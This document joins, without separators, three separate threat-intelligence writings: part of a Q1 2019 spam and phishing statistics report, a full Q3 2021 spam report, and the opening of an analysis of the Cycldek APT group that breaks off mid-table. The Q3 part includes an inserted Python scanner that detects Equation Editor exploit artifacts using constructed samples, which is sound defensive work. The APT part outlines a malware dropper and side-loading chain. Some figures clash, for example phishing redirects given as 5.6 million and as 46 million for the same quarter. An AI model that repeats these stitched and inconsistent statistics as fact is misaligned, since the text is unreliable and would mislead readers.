_Spam email size, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>))_

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased by 7.14 p.p. against Q4 2018, to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). Messages of 10–20 KB made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

### Malicious attachments: malware families

_TOP 10 malicious families in mail traffic, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>))_

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office, Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

### Countries targeted by malicious mailshots

_Countries targeted by malicious mailshots, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>))_

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%), followed by Vietnam (6.24%) in second and Russia (5.70%) in third.

## Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites.
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.

### Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

_Geography of phishing attacks, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>))_

In second place, up from eighth, was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-placed Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%), which prop up the Top 5.

**Country** | **%**\*
---|---
Brazil | 21.66
Australia | 17.20
Spain | 16.96
Portugal | 16.81
Venezuela | 16.72
Greece | 15.86
Albania | 15.11
Ecuador | 14.99
Rwanda | 14.89
Georgia | 14.76

_\* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country_

### Organizations under attack

_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._

This quarter, the banking sector remains in first place by number of attacks: the share of attacks on credit organizations increased by 5.23 p.p.
against Q4 last year to 25.78%.

_Distribution of organizations subjected to phishing attacks by category, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>))_

Second place went to global Internet portals (19.82%), and payment systems, another category that includes financial institutions, finished third (17.33%).

## Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** on the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (the Apple product launch, the New Zealand terror attack). Sextortion has not gone away; on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

_Source: Securelist, "Spam and phishing in Q1 2019", published 2019-05-15, <https://securelist.com/spam-and-phishing-in-q1-2019/90795/>. Vulnerabilities referenced: CVE-2017-11882, CVE-2018-0802._

## Spam and phishing in Q3 2021

## Quarterly highlights

### Scamming championship: sports-related fraud

This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races.
There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)

Scammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only with the hottest movie and TV releases as bait instead of sporting events.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)

Soccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, scammers used the Euro 2020 championship as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)

"Nigerian prince" scammers also kept a close eye on Q3's sporting fixtures.
The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)

Some messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November–December 2022, yet scammers are already inventing giveaways related to it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)

Among other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)

### Scam: get it yourself, share with friends

In Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey, playing a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and were then asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings.
Curiously, the scammers came up with fake round dates, for example the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites rather than trusting e-mails, which are easy to spoof.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)

There were also plenty of "holiday deals" supposedly from major Russian brands, some of them showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. The companies allegedly giving away large sums were all related to education in one way or another. The fraudulent scheme itself remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sent a message about the "promotion" to 20 contacts or 5 groups. The payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)

On a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; the cybercriminals were trying to make the offer look plausible. When trying to retrieve this code, the potential victim would most likely have been asked to pay a "commission" before being able to spend the prize money.
Note too that a QR code from a questionable source is just an opaque link or payment instruction: it can point to a malware download or to a payment in the scammers' favor.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)

In 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed between US$700 and US$2,000. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.

If the victim agreed, they were asked to link their payment details to the account in the system and to top it up by €6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the €6 and the payment details remained in the attackers' possession.

Note that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity, in particular the session cookies that keep you signed in to frequently used sites, so whoever obtains them can act as you there without knowing your password.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)

Even in official mobile app stores, malware can sometimes sneak in. This quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms.
The blurb described them as software that helps find and process government payments the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money the user was asked to "pay for legal services relating to form registration". The numerous positive reviews under the application, as well as a design mimicking real government sites, added credibility. We informed the store in question, which removed the fraudulent apps.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)

### Spam support: call now, regret later

E-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account frighten users more than abstract technical problems. The essence of the scam remained the same, however: the recipient, puzzled by an e-mail about a purchase or transfer they did not make, called the support number given in the message. To cancel the alleged transaction or purchase, they were asked for their login credentials for the site the e-mail supposedly came from. Those credentials went straight to the cybercriminals, giving them access to the victim's account. A genuine support line never needs your password to cancel a transaction, and the only safe way to reach support is through a number or address taken from the company's own website or the back of the card, never from the message that raised the alarm.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)

### COVID-19

New life was injected into the COVID-19 topic this quarter.
In connection with mass vaccination programs worldwide and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information (passport, phone, medical policy and insurance numbers, date of birth) and then to enter their card details to pay for the purchase. All of this information went straight to the fraudsters.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)

Spam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)

However, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting the name of Argentina's BBVA had a different objective. Users were invited to apply for a government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)

Cybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the Delta variant and about vaccination. The e-mail subjects were picked from various news sources, chosen, most likely, for their intriguing nature.
The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro that launches a PowerShell script. SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)

### Corporate privacy

A new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts: cybercriminals asked recipients to make a payment, but on going to the website to view the payment request, the potential victims were asked to enter their work account login details. If they complied, the attackers got hold of the account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)

## Statistics: spam

### Share of spam in mail traffic

In Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47%, down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.

_Share of spam in global mail traffic, April–September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_

In July, this indicator fell to its lowest value since the beginning of 2021 (44.95%), 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).

### Source of spam by country

The top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p.
and fell to fourth place, while the Netherlands held on to fifth (4.96%).

_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_

On the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 membership remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).

### Malicious mail attachments

Mail Anti-Virus blocked more malicious attachments this quarter than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.

_Dynamics of Mail Anti-Virus triggerings, April–September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_

During the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.

#### Malware families

In Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the previous quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place.
Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.

_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_

Sixth place in the TOP 10 malware families in Q3 spam went to [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Both are memory-corruption bugs in EQNEDT32.EXE, the Equation Editor process that Office spawns to handle legacy equation objects; a document only has to embed a crafted object for the exploit to fire when it is opened, no macro required. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).

The TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking.
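To make the Equation Editor exploits in this ranking actionable, here is a small triage scanner, added here as an example and not part of the original report or of Kaspersky's tooling. Both CVE-2017-11882 and CVE-2018-0802 are reached through an embedded Equation Editor OLE object, so the scanner flags the artifacts such an object leaves in a file: the Equation.3 ProgID, the EQNEDT32 executable name, the 'Equation Native' stream name (stored as UTF-16LE in a compound-file directory) and the Equation Editor CLSID {0002CE02-0000-0000-C000-000000000046} in its little-endian on-disk layout. It checks raw bytes, hex-decodes RTF \objdata payloads and walks the members of OOXML zip containers. The sample RTF and zip files it carries are constructed, schematic inputs for the demonstration, not real exploit documents.

```python
import io
import re
import zipfile

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} in the byte
# order a compound-file directory entry stores it (Data1..Data3 little-endian).
EQUATION_CLSID_LE = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")

# Byte-level indicators: report label -> pattern.
RAW_INDICATORS = {
    "progid Equation.3": re.compile(rb"Equation\.3"),
    "EQNEDT32 reference": re.compile(rb"EQNEDT32", re.IGNORECASE),
    "stream 'Equation Native'": re.compile(re.escape("Equation Native".encode("utf-16-le"))),
    "CLSID 0002CE02": re.compile(re.escape(EQUATION_CLSID_LE)),
}

# RTF carries embedded OLE objects as hex text after \objdata; whitespace is allowed inside.
RTF_OBJDATA = re.compile(rb"\\objdata\b\s*([0-9A-Fa-f\s]+)")


def _scan_raw(data, where):
    """Apply every indicator to one byte buffer; tag hits with where they were found."""
    return [f"{label} @ {where}" for label, pat in RAW_INDICATORS.items() if pat.search(data)]


def _rtf_objdata_blobs(data):
    """Yield the hex-decoded payload of each \\objdata group in an RTF file."""
    for m in RTF_OBJDATA.finditer(data):
        hexrun = re.sub(rb"\s+", b"", m.group(1))
        hexrun = hexrun[: len(hexrun) & ~1]  # drop a dangling nibble on truncated data
        try:
            yield bytes.fromhex(hexrun.decode("ascii"))
        except ValueError:
            continue


def scan_for_equation_editor(data):
    """Return sorted, de-duplicated Equation Editor indicators found in a document.

    RTF ('{\\rtf1', or the truncated '{\\rt' that Word still accepts): raw bytes plus
    decoded \\objdata payloads. OOXML (zip): raw bytes plus every member, which is
    where word/embeddings/oleObject*.bin lives. Anything else (legacy .doc/.xls
    compound files included): raw bytes only.
    """
    hits = _scan_raw(data, "raw")
    if data.lstrip().startswith(b"{\\rt"):
        for i, blob in enumerate(_rtf_objdata_blobs(data)):
            hits += _scan_raw(blob, f"rtf-objdata[{i}]")
    elif data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for name in zf.namelist():
                    hits += _scan_raw(zf.read(name), f"zip:{name}")
        except zipfile.BadZipFile:
            pass
    return sorted(set(hits))


def _build_zip(members):
    """Build an in-memory zip (deflated, like real OOXML) from a name -> bytes dict."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed, schematic inputs (not real exploit documents): an RTF whose \objdata
# holds an OLE1 header naming Equation.3, a compound-file signature and the CLSID ...
SAMPLE_RTF = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
    b"01050000 02000000 0b000000 "               # OLE1: version, FormatID=2 (embedded), name length
    + b"Equation.3\x00".hex().encode() + b"\n"   # class name, NUL-terminated
    + b"00000000 00000000 "                      # topic and item name lengths
    + b"d0cf11e0a1b11ae1 "                       # compound file magic
    + EQUATION_CLSID_LE.hex().encode() + b"}}}"
)
# ... a .docx-shaped zip whose embedded object names the 'Equation Native' stream
# and carries the CLSID, and a .docx-shaped zip with no embedded objects at all.
SAMPLE_DOCX_WITH_OLE = _build_zip({
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document/>",
    "word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
        + "Equation Native".encode("utf-16-le") + b"\x00" * 8 + EQUATION_CLSID_LE,
})
SAMPLE_CLEAN_DOCX = _build_zip({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"})

if __name__ == "__main__":
    for name, blob in [("rtf", SAMPLE_RTF), ("docx+ole", SAMPLE_DOCX_WITH_OLE), ("docx", SAMPLE_CLEAN_DOCX)]:
        print(name, scan_for_equation_editor(blob) or "no Equation Editor indicators")
```

A hit means the document embeds an Equation Editor object, which legitimate math-heavy documents from before 2018 also do, so this is a triage filter, not a verdict. A clean result means only that nothing obvious was found: the ProgID can be left out of the RTF text, and the hex run can be broken up with control words this regex does not expand. On the hardening side, Microsoft removed Equation Editor from Office in the January 2018 updates, so an EQNEDT32.EXE still present under Program Files\Common Files\Microsoft Shared\EQUATION on a workstation is itself a finding.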
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.

_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_

#### Countries targeted by malicious mailings

In Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, reaching 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out the TOP 3, its share continuing to decline in Q3.

_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_

Brazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) dropped to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).

## Statistics: phishing

In Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.

### Geography of phishing attacks

Brazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).

_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_

### Top-level domains

The top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p.
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.

_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_

The Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).

### Organizations under phishing attack

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._

Global internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.

_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_

The seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter.
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.

_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_

On WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though: on July 12–16 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices.
We cannot say for sure what exactly these accounts get up to, or whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)

**_Dynamics of phishing activity on WhatsApp, Q3 2021_**

As for Telegram, phishing activity there increased slightly towards the end of the quarter.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)

**_Dynamics of phishing activity on Telegram, Q3 2021_**

## Takeaways

Next quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms: such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed: even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.

The COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings.
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.

_Source: "Spam and phishing in Q3 2021", Securelist, published 2021-11-01, https://securelist.com/spam-and-phishing-in-q3-2021/104741/_

## Key findings

While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi.
Here are some key insights that will be described in this publication:

 * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.
 * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.
 * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.
 * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.

## Background

Cycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:

 * 2013: indicators affiliated to the group were found in the network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.
 * 2014: further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam.
The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, which was typically leveraged by Chinese-speaking actors.
 * 2017: the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.
 * 2018: attacks were witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and are the subject matter of this blog post.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)

**_Figure 1: Timeline of Cycldek-attributed attacks._**

Most attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:

 * a legitimate signed application, usually related to an AV product, e.g. QcConsol, McAfee's QuickClean utility, or wsc_proxy.exe, Avast's remediation service;
 * a malicious DLL which is side-loaded by the former application;
 * an encrypted binary which gets decrypted and executed by the DLL.

The final payload that is run in memory is malware known as NewCore RAT.
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.

In the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.

## Two implants, two clusters

When inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.

Our analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters.
Notable characteristics of each cluster's implant are summarized in the table below.

| | **BlueCore** | **RedCore** |
|---|---|---|
| Initial infection vector | RTF documents | Unknown |
| Legitimate AV utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) |
